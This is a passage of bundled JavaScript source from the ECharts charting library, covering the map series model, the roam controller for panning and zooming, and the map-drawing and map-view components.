this).option.map;\n    },\n\n    // _fillOption: function (option, mapName) {\n        // Shallow clone\n        // option = zrUtil.extend({}, option);\n\n        // option.data = geoCreator.getFilledRegions(option.data, mapName, option.nameMap);\n\n        // return option;\n    // },\n\n    getRawValue: function (dataIndex) {\n        // Use value stored in data instead because it is calculated from multiple series\n        // FIXME Provide all value of multiple series ?\n        var data = this.getData();\n        return data.get(data.mapDimension('value'), dataIndex);\n    },\n\n    /**\n     * Get model of region\n     * @param  {string} name\n     * @return {module:echarts/model/Model}\n     */\n    getRegionModel: function (regionName) {\n        var data = this.getData();\n        return data.getItemModel(data.indexOfName(regionName));\n    },\n\n    /**\n     * Map tooltip formatter\n     *\n     * @param {number} dataIndex\n     */\n    formatTooltip: function (dataIndex) {\n        // FIXME orignalData and data is a bit confusing\n        var data = this.getData();\n        var formattedValue = addCommas(this.getRawValue(dataIndex));\n        var name = data.getName(dataIndex);\n\n        var seriesGroup = this.seriesGroup;\n        var seriesNames = [];\n        for (var i = 0; i < seriesGroup.length; i++) {\n            var otherIndex = seriesGroup[i].originalData.indexOfName(name);\n            var valueDim = data.mapDimension('value');\n            if (!isNaN(seriesGroup[i].originalData.get(valueDim, otherIndex))) {\n                seriesNames.push(\n                    encodeHTML(seriesGroup[i].name)\n                );\n            }\n        }\n\n        return seriesNames.join(', ') + '<br />'\n            + encodeHTML(name + ' : ' + formattedValue);\n    },\n\n    /**\n     * @implement\n     */\n    getTooltipPosition: function (dataIndex) {\n        if (dataIndex != null) {\n            var name = this.getData().getName(dataIndex);\n            var geo = this.coordinateSystem;\n            var region = geo.getRegion(name);\n\n            return region && geo.dataToPoint(region.center);\n        }\n    },\n\n    setZoom: function (zoom) {\n        this.option.zoom = zoom;\n    },\n\n    setCenter: function (center) {\n        this.option.center = center;\n    },\n\n    defaultOption: {\n        // 一级层叠\n        zlevel: 0,\n        // 二级层叠\n        z: 2,\n\n        coordinateSystem: 'geo',\n\n        // map should be explicitly specified since ec3.\n        map: '',\n\n        // If `geoIndex` is not specified, a exclusive geo will be\n        // created. Otherwise use the specified geo component, and\n        // `map` and `mapType` are ignored.\n        // geoIndex: 0,\n\n        // 'center' | 'left' | 'right' | 'x%' | {number}\n        left: 'center',\n        // 'center' | 'top' | 'bottom' | 'x%' | {number}\n        top: 'center',\n        // right\n        // bottom\n        // width:\n        // height\n\n        // Aspect is width / height. Inited to be geoJson bbox aspect\n        // This parameter is used for scale this aspect\n        aspectScale: 0.75,\n\n        ///// Layout with center and size\n        // If you wan't to put map in a fixed size box with right aspect ratio\n        // This two properties may more conveninet\n        // layoutCenter: [50%, 50%]\n        // layoutSize: 100\n\n\n        // 数值合并方式，默认加和，可选为：\n        // 'sum' | 'average' | 'max' | 'min'\n        // mapValueCalculation: 'sum',\n        // 地图数值计算结果小数精度\n        // mapValuePrecision: 0,\n\n\n        // 显示图例颜色标识（系列标识的小圆点），图例开启时有效\n        showLegendSymbol: true,\n        // 选择模式，默认关闭，可选single，multiple\n        // selectedMode: false,\n        dataRangeHoverLink: true,\n        // 是否开启缩放及漫游模式\n        // roam: false,\n\n        // Define left-top, right-bottom coords to control view\n        // For example, [ [180, 90], [-180, -90] ],\n        // higher priority than center and zoom\n        boundingCoords: null,\n\n        // Default on center of map\n        center: null,\n\n        zoom: 1,\n\n        scaleLimit: null,\n\n        label: {\n            show: false,\n            color: '#000'\n        },\n        // scaleLimit: null,\n        itemStyle: {\n            borderWidth: 0.5,\n            borderColor: '#444',\n            areaColor: '#eee'\n        },\n\n        emphasis: {\n            label: {\n                show: true,\n                color: 'rgb(100,0,0)'\n            },\n            itemStyle: {\n                areaColor: 'rgba(255,215,0,0.8)'\n            }\n        }\n    }\n\n});\n\nmixin(MapSeries, selectableMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar ATTR = '\\0_ec_interaction_mutex';\n\nfunction take(zr, resourceKey, userKey) {\n    var store = getStore(zr);\n    store[resourceKey] = userKey;\n}\n\nfunction release(zr, resourceKey, userKey) {\n    var store = getStore(zr);\n    var uKey = store[resourceKey];\n\n    if (uKey === userKey) {\n        store[resourceKey] = null;\n    }\n}\n\nfunction isTaken(zr, resourceKey) {\n    return !!getStore(zr)[resourceKey];\n}\n\nfunction getStore(zr) {\n    return zr[ATTR] || (zr[ATTR] = {});\n}\n\n/**\n * payload: {\n *     type: 'takeGlobalCursor',\n *     key: 'dataZoomSelect', or 'brush', or ...,\n *         If no userKey, release global cursor.\n * }\n */\nregisterAction(\n    {type: 'takeGlobalCursor', event: 'globalCursorTaken', update: 'update'},\n    function () {}\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @alias module:echarts/component/helper/RoamController\n * @constructor\n * @mixin {module:zrender/mixin/Eventful}\n *\n * @param {module:zrender/zrender~ZRender} zr\n */\nfunction RoamController(zr) {\n\n    /**\n     * @type {Function}\n     */\n    this.pointerChecker;\n\n    /**\n     * @type {module:zrender}\n     */\n    this._zr = zr;\n\n    /**\n     * @type {Object}\n     */\n    this._opt = {};\n\n    // Avoid two roamController bind the same handler\n    var bind$$1 = bind;\n    var mousedownHandler = bind$$1(mousedown, this);\n    var mousemoveHandler = bind$$1(mousemove, this);\n    var mouseupHandler = bind$$1(mouseup, this);\n    var mousewheelHandler = bind$$1(mousewheel, this);\n    var pinchHandler = bind$$1(pinch, this);\n\n    Eventful.call(this);\n\n    /**\n     * @param {Function} pointerChecker\n     *                   input: x, y\n     *                   output: boolean\n     */\n    this.setPointerChecker = function (pointerChecker) {\n        this.pointerChecker = pointerChecker;\n    };\n\n    /**\n     * Notice: only enable needed types. For example, if 'zoom'\n     * is not needed, 'zoom' should not be enabled, otherwise\n     * default mousewheel behaviour (scroll page) will be disabled.\n     *\n     * @param  {boolean|string} [controlType=true] Specify the control type,\n     *                          which can be null/undefined or true/false\n     *                          or 'pan/move' or 'zoom'/'scale'\n     * @param {Object} [opt]\n     * @param {Object} [opt.zoomOnMouseWheel=true] The value can be: true / false / 'shift' / 'ctrl' / 'alt'.\n     * @param {Object} [opt.moveOnMouseMove=true] The value can be: true / false / 'shift' / 'ctrl' / 'alt'.\n     * @param {Object} [opt.moveOnMouseWheel=false] The value can be: true / false / 'shift' / 'ctrl' / 'alt'.\n     * @param {Object} [opt.preventDefaultMouseMove=true] When pan.\n     */\n    this.enable = function (controlType, opt) {\n\n        // Disable previous first\n        this.disable();\n\n        this._opt = defaults(clone(opt) || {}, {\n            zoomOnMouseWheel: true,\n            moveOnMouseMove: true,\n            // By default, wheel do not trigger move.\n            moveOnMouseWheel: false,\n            preventDefaultMouseMove: true\n        });\n\n        if (controlType == null) {\n            controlType = true;\n        }\n\n        if (controlType === true || (controlType === 'move' || controlType === 'pan')) {\n            zr.on('mousedown', mousedownHandler);\n            zr.on('mousemove', mousemoveHandler);\n            zr.on('mouseup', mouseupHandler);\n        }\n        if (controlType === true || (controlType === 'scale' || controlType === 'zoom')) {\n            zr.on('mousewheel', mousewheelHandler);\n            zr.on('pinch', pinchHandler);\n        }\n    };\n\n    this.disable = function () {\n        zr.off('mousedown', mousedownHandler);\n        zr.off('mousemove', mousemoveHandler);\n        zr.off('mouseup', mouseupHandler);\n        zr.off('mousewheel', mousewheelHandler);\n        zr.off('pinch', pinchHandler);\n    };\n\n    this.dispose = this.disable;\n\n    this.isDragging = function () {\n        return this._dragging;\n    };\n\n    this.isPinching = function () {\n        return this._pinching;\n    };\n}\n\nmixin(RoamController, Eventful);\n\n\nfunction mousedown(e) {\n    if (isMiddleOrRightButtonOnMouseUpDown(e)\n        || (e.target && e.target.draggable)\n    ) {\n        return;\n    }\n\n    var x = e.offsetX;\n    var y = e.offsetY;\n\n    // Only check on mosedown, but not mousemove.\n    // Mouse can be out of target when mouse moving.\n    if (this.pointerChecker && this.pointerChecker(e, x, y)) {\n        this._x = x;\n        this._y = y;\n        this._dragging = true;\n    }\n}\n\nfunction mousemove(e) {\n    if (!this._dragging\n        || !isAvailableBehavior('moveOnMouseMove', e, this._opt)\n        || e.gestureEvent === 'pinch'\n        || isTaken(this._zr, 'globalPan')\n    ) {\n        return;\n    }\n\n    var x = e.offsetX;\n    var y = e.offsetY;\n\n    var oldX = this._x;\n    var oldY = this._y;\n\n    var dx = x - oldX;\n    var dy = y - oldY;\n\n    this._x = x;\n    this._y = y;\n\n    this._opt.preventDefaultMouseMove && stop(e.event);\n\n    trigger(this, 'pan', 'moveOnMouseMove', e, {\n        dx: dx, dy: dy, oldX: oldX, oldY: oldY, newX: x, newY: y\n    });\n}\n\nfunction mouseup(e) {\n    if (!isMiddleOrRightButtonOnMouseUpDown(e)) {\n        this._dragging = false;\n    }\n}\n\nfunction mousewheel(e) {\n    var shouldZoom = isAvailableBehavior('zoomOnMouseWheel', e, this._opt);\n    var shouldMove = isAvailableBehavior('moveOnMouseWheel', e, this._opt);\n    var wheelDelta = e.wheelDelta;\n    var absWheelDeltaDelta = Math.abs(wheelDelta);\n    var originX = e.offsetX;\n    var originY = e.offsetY;\n\n    // wheelDelta maybe -0 in chrome mac.\n    if (wheelDelta === 0 || (!shouldZoom && !shouldMove)) {\n        return;\n    }\n\n    // If both `shouldZoom` and `shouldMove` is true, trigger\n    // their event both, and the final behavior is determined\n    // by event listener themselves.\n\n    if (shouldZoom) {\n        // Convenience:\n        // Mac and VM Windows on Mac: scroll up: zoom out.\n        // Windows: scroll up: zoom in.\n\n        // FIXME: Should do more test in different environment.\n        // wheelDelta is too complicated in difference nvironment\n        // (https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel),\n        // although it has been normallized by zrender.\n        // wheelDelta of mouse wheel is bigger than touch pad.\n        var factor = absWheelDeltaDelta > 3 ? 1.4 : absWheelDeltaDelta > 1 ? 1.2 : 1.1;\n        var scale = wheelDelta > 0 ? factor : 1 / factor;\n        checkPointerAndTrigger(this, 'zoom', 'zoomOnMouseWheel', e, {\n            scale: scale, originX: originX, originY: originY\n        });\n    }\n\n    if (shouldMove) {\n        // FIXME: Should do more test in different environment.\n        var absDelta = Math.abs(wheelDelta);\n        // wheelDelta of mouse wheel is bigger than touch pad.\n        var scrollDelta = (wheelDelta > 0 ? 1 : -1) * (absDelta > 3 ? 0.4 : absDelta > 1 ? 0.15 : 0.05);\n        checkPointerAndTrigger(this, 'scrollMove', 'moveOnMouseWheel', e, {\n            scrollDelta: scrollDelta, originX: originX, originY: originY\n        });\n    }\n}\n\nfunction pinch(e) {\n    if (isTaken(this._zr, 'globalPan')) {\n        return;\n    }\n    var scale = e.pinchScale > 1 ? 1.1 : 1 / 1.1;\n    checkPointerAndTrigger(this, 'zoom', null, e, {\n        scale: scale, originX: e.pinchX, originY: e.pinchY\n    });\n}\n\nfunction checkPointerAndTrigger(controller, eventName, behaviorToCheck, e, contollerEvent) {\n    if (controller.pointerChecker\n        && controller.pointerChecker(e, contollerEvent.originX, contollerEvent.originY)\n    ) {\n        // When mouse is out of roamController rect,\n        // default befavoius should not be be disabled, otherwise\n        // page sliding is disabled, contrary to expectation.\n        stop(e.event);\n\n        trigger(controller, eventName, behaviorToCheck, e, contollerEvent);\n    }\n}\n\nfunction trigger(controller, eventName, behaviorToCheck, e, contollerEvent) {\n    // Also provide behavior checker for event listener, for some case that\n    // multiple components share one listener.\n    contollerEvent.isAvailableBehavior = bind(isAvailableBehavior, null, behaviorToCheck, e);\n    controller.trigger(eventName, contollerEvent);\n}\n\n// settings: {\n//     zoomOnMouseWheel\n//     moveOnMouseMove\n//     moveOnMouseWheel\n// }\n// The value can be: true / false / 'shift' / 'ctrl' / 'alt'.\nfunction isAvailableBehavior(behaviorToCheck, e, settings) {\n    var setting = settings[behaviorToCheck];\n    return !behaviorToCheck || (\n        setting && (!isString(setting) || e.event[setting + 'Key'])\n    );\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n/**\n * For geo and graph.\n *\n * @param {Object} controllerHost\n * @param {module:zrender/Element} controllerHost.target\n */\nfunction updateViewOnPan(controllerHost, dx, dy) {\n    var target = controllerHost.target;\n    var pos = target.position;\n    pos[0] += dx;\n    pos[1] += dy;\n    target.dirty();\n}\n\n/**\n * For geo and graph.\n *\n * @param {Object} controllerHost\n * @param {module:zrender/Element} controllerHost.target\n * @param {number} controllerHost.zoom\n * @param {number} controllerHost.zoomLimit like: {min: 1, max: 2}\n */\nfunction updateViewOnZoom(controllerHost, zoomDelta, zoomX, zoomY) {\n    var target = controllerHost.target;\n    var zoomLimit = controllerHost.zoomLimit;\n    var pos = target.position;\n    var scale = target.scale;\n\n    var newZoom = controllerHost.zoom = controllerHost.zoom || 1;\n    newZoom *= zoomDelta;\n    if (zoomLimit) {\n        var zoomMin = zoomLimit.min || 0;\n        var zoomMax = zoomLimit.max || Infinity;\n        newZoom = Math.max(\n            Math.min(zoomMax, newZoom),\n            zoomMin\n        );\n    }\n    var zoomScale = newZoom / controllerHost.zoom;\n    controllerHost.zoom = newZoom;\n    // Keep the mouse center when scaling\n    pos[0] -= (zoomX - pos[0]) * (zoomScale - 1);\n    pos[1] -= (zoomY - pos[1]) * (zoomScale - 1);\n    scale[0] *= zoomScale;\n    scale[1] *= zoomScale;\n\n    target.dirty();\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar IRRELEVANT_EXCLUDES = {'axisPointer': 1, 'tooltip': 1, 'brush': 1};\n\n/**\n * Avoid that: mouse click on a elements that is over geo or graph,\n * but roam is triggered.\n */\nfunction onIrrelevantElement(e, api, targetCoordSysModel) {\n    var model = api.getComponentByElement(e.topTarget);\n    // If model is axisModel, it works only if it is injected with coordinateSystem.\n    var coordSys = model && model.coordinateSystem;\n    return model\n        && model !== targetCoordSysModel\n        && !IRRELEVANT_EXCLUDES[model.mainType]\n        && (coordSys && coordSys.model !== targetCoordSysModel);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction getFixedItemStyle(model) {\n    var itemStyle = model.getItemStyle();\n    var areaColor = model.get('areaColor');\n\n    // If user want the color not to be changed when hover,\n    // they should both set areaColor and color to be null.\n    if (areaColor != null) {\n        itemStyle.fill = areaColor;\n    }\n\n    return itemStyle;\n}\n\nfunction updateMapSelectHandler(mapDraw, mapOrGeoModel, regionsGroup, api, fromView) {\n    regionsGroup.off('click');\n    regionsGroup.off('mousedown');\n\n    if (mapOrGeoModel.get('selectedMode')) {\n\n        regionsGroup.on('mousedown', function () {\n            mapDraw._mouseDownFlag = true;\n        });\n\n        regionsGroup.on('click', function (e) {\n            if (!mapDraw._mouseDownFlag) {\n                return;\n            }\n            mapDraw._mouseDownFlag = false;\n\n            var el = e.target;\n            while (!el.__regions) {\n                el = el.parent;\n            }\n            if (!el) {\n                return;\n            }\n\n            var action = {\n                type: (mapOrGeoModel.mainType === 'geo' ? 'geo' : 'map') + 'ToggleSelect',\n                batch: map(el.__regions, function (region) {\n                    return {\n                        name: region.name,\n                        from: fromView.uid\n                    };\n                })\n            };\n            action[mapOrGeoModel.mainType + 'Id'] = mapOrGeoModel.id;\n\n            api.dispatchAction(action);\n\n            updateMapSelected(mapOrGeoModel, regionsGroup);\n        });\n    }\n}\n\nfunction updateMapSelected(mapOrGeoModel, regionsGroup) {\n    // FIXME\n    regionsGroup.eachChild(function (otherRegionEl) {\n        each$1(otherRegionEl.__regions, function (region) {\n            otherRegionEl.trigger(mapOrGeoModel.isSelected(region.name) ? 'emphasis' : 'normal');\n        });\n    });\n}\n\n/**\n * @alias module:echarts/component/helper/MapDraw\n * @param {module:echarts/ExtensionAPI} api\n * @param {boolean} updateGroup\n */\nfunction MapDraw(api, updateGroup) {\n\n    var group = new Group();\n\n    /**\n     * @type {string}\n     * @private\n     */\n    this.uid = getUID('ec_map_draw');\n\n    /**\n     * @type {module:echarts/component/helper/RoamController}\n     * @private\n     */\n    this._controller = new RoamController(api.getZr());\n\n    /**\n     * @type {Object} {target, zoom, zoomLimit}\n     * @private\n     */\n    this._controllerHost = {target: updateGroup ? group : null};\n\n    /**\n     * @type {module:zrender/container/Group}\n     * @readOnly\n     */\n    this.group = group;\n\n    /**\n     * @type {boolean}\n     * @private\n     */\n    this._updateGroup = updateGroup;\n\n    /**\n     * This flag is used to make sure that only one among\n     * `pan`, `zoom`, `click` can occurs, otherwise 'selected'\n     * action may be triggered when `pan`, which is unexpected.\n     * @type {booelan}\n     */\n    this._mouseDownFlag;\n\n    /**\n     * @type {string}\n     */\n    this._mapName;\n\n    /**\n     * @type {boolean}\n     */\n    this._initialized;\n\n    /**\n     * @type {module:zrender/container/Group}\n     */\n    group.add(this._regionsGroup = new Group());\n\n    /**\n     * @type {module:zrender/container/Group}\n     */\n    group.add(this._backgroundGroup = new Group());\n}\n\nMapDraw.prototype = {\n\n    constructor: MapDraw,\n\n    draw: function (mapOrGeoModel, ecModel, api, fromView, payload) {\n\n        var isGeo = mapOrGeoModel.mainType === 'geo';\n\n        // Map series has data. GEO model that controlled by map series\n        // will be assigned with map data. Other GEO model has no data.\n        var data = mapOrGeoModel.getData && mapOrGeoModel.getData();\n        isGeo && ecModel.eachComponent({mainType: 'series', subType: 'map'}, function (mapSeries) {\n            if (!data && mapSeries.getHostGeoModel() === mapOrGeoModel) {\n                data = mapSeries.getData();\n            }\n        });\n\n        var geo = mapOrGeoModel.coordinateSystem;\n\n        this._updateBackground(geo);\n\n        var regionsGroup = this._regionsGroup;\n        var group = this.group;\n\n        var transformInfo = geo.getTransformInfo();\n        group.transform = transformInfo.roamTransform;\n        group.decomposeTransform();\n        group.dirty();\n\n        var scale = transformInfo.rawScale;\n        var position = transformInfo.rawPosition;\n\n        regionsGroup.removeAll();\n\n        var itemStyleAccessPath = ['itemStyle'];\n        var hoverItemStyleAccessPath = ['emphasis', 'itemStyle'];\n        var labelAccessPath = ['label'];\n        var hoverLabelAccessPath = ['emphasis', 'label'];\n        var nameMap = createHashMap();\n\n        each$1(geo.regions, function (region) {\n            // Consider in GeoJson properties.name may be duplicated, for example,\n            // there is multiple region named \"United Kindom\" or \"France\" (so many\n            // colonies). And it is not appropriate to merge them in geo, which\n            // will make them share the same label and bring trouble in label\n            // location calculation.\n            var regionGroup = nameMap.get(region.name)\n                || nameMap.set(region.name, new Group());\n\n            var compoundPath = new CompoundPath({\n                segmentIgnoreThreshold: 1,\n                shape: {\n                    paths: []\n                }\n            });\n            regionGroup.add(compoundPath);\n\n            var regionModel = mapOrGeoModel.getRegionModel(region.name) || mapOrGeoModel;\n\n            var itemStyleModel = regionModel.getModel(itemStyleAccessPath);\n            var hoverItemStyleModel = regionModel.getModel(hoverItemStyleAccessPath);\n            var itemStyle = getFixedItemStyle(itemStyleModel);\n            var hoverItemStyle = getFixedItemStyle(hoverItemStyleModel);\n\n            var labelModel = regionModel.getModel(labelAccessPath);\n            var hoverLabelModel = regionModel.getModel(hoverLabelAccessPath);\n\n            var dataIdx;\n            // Use the itemStyle in data if has data\n            if (data) {\n                dataIdx = data.indexOfName(region.name);\n                // Only visual color of each item will be used. It can be encoded by dataRange\n                // But visual color of series is used in symbol drawing\n                //\n                // Visual color for each series is for the symbol draw\n                var visualColor = data.getItemVisual(dataIdx, 'color', true);\n                if (visualColor) {\n                    itemStyle.fill = visualColor;\n                }\n            }\n\n            var transformPoint = function (point) {\n                return [\n                    point[0] * scale[0] + position[0],\n                    point[1] * scale[1] + position[1]\n                ];\n            };\n\n            each$1(region.geometries, function (geometry) {\n                if (geometry.type !== 'polygon') {\n                    return;\n                }\n                var points = [];\n                for (var i = 0; i < geometry.exterior.length; ++i) {\n                    points.push(transformPoint(geometry.exterior[i]));\n                }\n                compoundPath.shape.paths.push(new Polygon({\n                    segmentIgnoreThreshold: 1,\n                    shape: {\n                        points: points\n                    }\n                }));\n\n                for (var i = 0; i < (geometry.interiors ? geometry.interiors.length : 0); ++i) {\n                    var interior = geometry.interiors[i];\n                    var points = [];\n                    for (var j = 0; j < interior.length; ++j) {\n                        points.push(transformPoint(interior[j]));\n                    }\n                    compoundPath.shape.paths.push(new Polygon({\n                        segmentIgnoreThreshold: 1,\n                        shape: {\n                            points: points\n                        }\n                    }));\n                }\n            });\n\n            compoundPath.setStyle(itemStyle);\n            compoundPath.style.strokeNoScale = true;\n            compoundPath.culling = true;\n\n            // Label\n            var showLabel = labelModel.get('show');\n            var hoverShowLabel = hoverLabelModel.get('show');\n\n            var isDataNaN = data && isNaN(data.get(data.mapDimension('value'), dataIdx));\n            var itemLayout = data && data.getItemLayout(dataIdx);\n            // In the following cases label will be drawn\n            // 1. In map series and data value is NaN\n            // 2. In geo component\n            // 4. Region has no series legendSymbol, which will be add a showLabel flag in mapSymbolLayout\n            if (\n                (isGeo || isDataNaN && (showLabel || hoverShowLabel))\n                || (itemLayout && itemLayout.showLabel)\n            ) {\n                var query = !isGeo ? dataIdx : region.name;\n                var labelFetcher;\n\n                // Consider dataIdx not found.\n                if (!data || dataIdx >= 0) {\n                    labelFetcher = mapOrGeoModel;\n                }\n\n                var textEl = new Text({\n                    position: transformPoint(region.center.slice()),\n                    // FIXME\n                    // label rotation is not support yet in geo or regions of series-map\n                    // that has no data. The rotation will be effected by this `scale`.\n                    // So needed to change to RectText?\n                    scale: [1 / group.scale[0], 1 / group.scale[1]],\n                    z2: 10,\n                    silent: true\n                });\n\n                setLabelStyle(\n                    textEl.style, textEl.hoverStyle = {}, labelModel, hoverLabelModel,\n                    {\n                        labelFetcher: labelFetcher,\n                        labelDataIndex: query,\n                        defaultText: region.name,\n                        useInsideStyle: false\n                    },\n                    {\n                        textAlign: 'center',\n                        textVerticalAlign: 'middle'\n                    }\n                );\n\n                regionGroup.add(textEl);\n            }\n\n            // setItemGraphicEl, setHoverStyle after all polygons and labels\n            // are added to the rigionGroup\n            if (data) {\n                data.setItemGraphicEl(dataIdx, regionGroup);\n            }\n            else {\n                var regionModel = mapOrGeoModel.getRegionModel(region.name);\n                // Package custom mouse event for geo component\n                compoundPath.eventData = {\n                    componentType: 'geo',\n                    componentIndex: mapOrGeoModel.componentIndex,\n                    geoIndex: mapOrGeoModel.componentIndex,\n                    name: region.name,\n                    region: (regionModel && regionModel.option) || {}\n                };\n            }\n\n            var groupRegions = regionGroup.__regions || (regionGroup.__regions = []);\n            groupRegions.push(region);\n\n            regionGroup.highDownSilentOnTouch = !!mapOrGeoModel.get('selectedMode');\n            setHoverStyle(regionGroup, hoverItemStyle);\n\n            regionsGroup.add(regionGroup);\n        });\n\n        this._updateController(mapOrGeoModel, ecModel, api);\n\n        updateMapSelectHandler(this, mapOrGeoModel, regionsGroup, api, fromView);\n\n        updateMapSelected(mapOrGeoModel, regionsGroup);\n    },\n\n    remove: function () {\n        this._regionsGroup.removeAll();\n        this._backgroundGroup.removeAll();\n        this._controller.dispose();\n        this._mapName && geoSourceManager.removeGraphic(this._mapName, this.uid);\n        this._mapName = null;\n        this._controllerHost = {};\n    },\n\n    _updateBackground: function (geo) {\n        var mapName = geo.map;\n\n        if (this._mapName !== mapName) {\n            each$1(geoSourceManager.makeGraphic(mapName, this.uid), function (root) {\n                this._backgroundGroup.add(root);\n            }, this);\n        }\n\n        this._mapName = mapName;\n    },\n\n    _updateController: function (mapOrGeoModel, ecModel, api) {\n        var geo = mapOrGeoModel.coordinateSystem;\n        var controller = this._controller;\n        var controllerHost = this._controllerHost;\n\n        controllerHost.zoomLimit = mapOrGeoModel.get('scaleLimit');\n        controllerHost.zoom = geo.getZoom();\n\n        // roamType is will be set default true if it is null\n        controller.enable(mapOrGeoModel.get('roam') || false);\n        var mainType = mapOrGeoModel.mainType;\n\n        function makeActionBase() {\n            var action = {\n                type: 'geoRoam',\n                componentType: mainType\n            };\n            action[mainType + 'Id'] = mapOrGeoModel.id;\n            return action;\n        }\n\n        controller.off('pan').on('pan', function (e) {\n            this._mouseDownFlag = false;\n\n            updateViewOnPan(controllerHost, e.dx, e.dy);\n\n            api.dispatchAction(extend(makeActionBase(), {\n                dx: e.dx,\n                dy: e.dy\n            }));\n        }, this);\n\n        controller.off('zoom').on('zoom', function (e) {\n            this._mouseDownFlag = false;\n\n            updateViewOnZoom(controllerHost, e.scale, e.originX, e.originY);\n\n            api.dispatchAction(extend(makeActionBase(), {\n                zoom: e.scale,\n                originX: e.originX,\n                originY: e.originY\n            }));\n\n            if (this._updateGroup) {\n                var scale = this.group.scale;\n                this._regionsGroup.traverse(function (el) {\n                    if (el.type === 'text') {\n                        el.attr('scale', [1 / scale[0], 1 / scale[1]]);\n                    }\n                });\n            }\n        }, this);\n\n        controller.setPointerChecker(function (e, x, y) {\n            return geo.getViewRectAfterRoam().contain(x, y)\n                && !onIrrelevantElement(e, api, mapOrGeoModel);\n        });\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar HIGH_DOWN_PROP = '__seriesMapHighDown';\nvar RECORD_VERSION_PROP = '__seriesMapCallKey';\n\nextendChartView({\n\n    type: 'map',\n\n    render: function (mapModel, ecModel, api, payload) {\n        // Not render if it is an toggleSelect action from self\n        if (payload && payload.type === 'mapToggleSelect'\n            && payload.from === this.uid\n        ) {\n            return;\n        }\n\n        var group = this.group;\n        group.removeAll();\n\n        if (mapModel.getHostGeoModel()) {\n            return;\n        }\n\n        // Not update map if it is an roam action from self\n        if (!(payload && payload.type === 'geoRoam'\n                && payload.componentType === 'series'\n                && payload.seriesId === mapModel.id\n            )\n        ) {\n            if (mapModel.needsDrawMap) {\n                var mapDraw = this._mapDraw || new MapDraw(api, true);\n                group.add(mapDraw.group);\n\n                mapDraw.draw(mapModel, ecModel, api, this, payload);\n\n                this._mapDraw = mapDraw;\n            }\n            else {\n                // Remove drawed map\n                this._mapDraw && this._mapDraw.remove();\n                this._mapDraw = null;\n            }\n        }\n        else {\n            var mapDraw = this._mapDraw;\n            mapDraw && group.add(mapDraw.group);\n        }\n\n        mapModel.get('showLegendSymbol') && ecModel.getComponent('legend')\n            && this._renderSymbols(mapModel, ecModel, api);\n    },\n\n    remove: function () {\n        this._mapDraw && this._mapDraw.remove();\n        this._mapDraw = null;\n        this.group.removeAll();\n    },\n\n    dispose: function () {\n        this._mapDraw && this._mapDraw.remove();\n        this._mapDraw = null;\n    },\n\n    _renderSymbols: function (mapModel, ecModel, api) {\n        var originalData = mapModel.originalData;\n        var group = this.group;\n\n        originalData.each(originalData.mapDimension('value'), function (value, originalDataIndex) {\n            if (isNaN(value)) {\n                return;\n            }\n\n            var layout = originalData.getItemLayout(originalDataIndex);\n\n            if (!layout || !layout.point) 